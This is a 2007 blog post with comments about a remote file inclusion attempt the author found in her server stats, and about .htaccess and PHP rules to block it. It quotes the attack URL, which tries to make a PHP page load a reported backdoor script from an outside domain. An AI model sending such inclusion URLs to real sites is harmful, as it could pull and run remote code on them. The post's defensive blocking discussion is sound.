Hack Attempt?
Sat, 17 March, 2007 – 1:19 am
After just running through my stats to see if there are any further holes I can close to limit bandwidth (yes I'm still on this subject!) I noticed the following had been visited in various guises
/pages.php?load=http://stoerlein.de/images/kgb.c?
Looking at the site that's referenced contains a whole web page mainly constructed of PHP (and Frontpage as the generator!!). However, naturally I'm concerned as it's not a hack I recognise. So far the attempts I've seen have just produced a 404, however, without knowing what this script does, it may run on the right (or in my case, wrong) file.
So now I'm trying to work out (and have already been for another reason too) how to use htaccess to read the REQUEST_URI and identify that if a certain string is contained within it then I can return a 403. Unfortunately I've not had much luck yet 
It's worth checking your stats over once in a while. You never know what you may notice.
Hmm okay I got my first problem solved (after a day of searching and trying everything I could find or think of!). Yet the same method doesn't want to work for blocking this hack attempt.
I have
RedirectMatch 410 ^(.*)stoerlein.de.*$RedirectMatch 410 ^(.*)/trackback/$
The second line works for any trackback URL on a post on this site (which have all been heavily spammed and are now just skewing my stats). However the first line doesn't do anything. I'm only guessing what the above means so it could be badly wrong!
Anyone a htaccess expert out there?
By Sarah on Sat, 17 March, 2007
That dot separating the TLD and domain name may need escaping
By David Salisbury on Mon, 19 March, 2007
Further to that I'm not sure that you can use query strings with the various Redirect directives. You may need use something like this:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)stoerlein.de.*$
RewriteRule .* – [G]
By David Salisbury on Mon, 19 March, 2007
Cheers Dave, I'll give that a go
By Sarah on Tue, 20 March, 2007
Unfortunately the rewrite didn't work despite there being no reason for it not working. Probably the numerous other lines of spam blocking I have in my htaccess!
Anyhow, PHP to the rescue and in good time as I've had 40 hits today alone with this script from various domains. Apparently it's a backdoor trojan according to a friend's firewall so clearly not a nice script. Still, it's blocked for now. I'll post up the code in the morning.
I've also had to block visitors with empty user agents (sorry to anyone who has this but I've not spotted any in my server logs). The site was getting hammered today by some bot, so there's another block in place.
It makes me wonder whether it's worth keeping the site running with receiving more bots than humans as visitors!
By Sarah on Tue, 20 March, 2007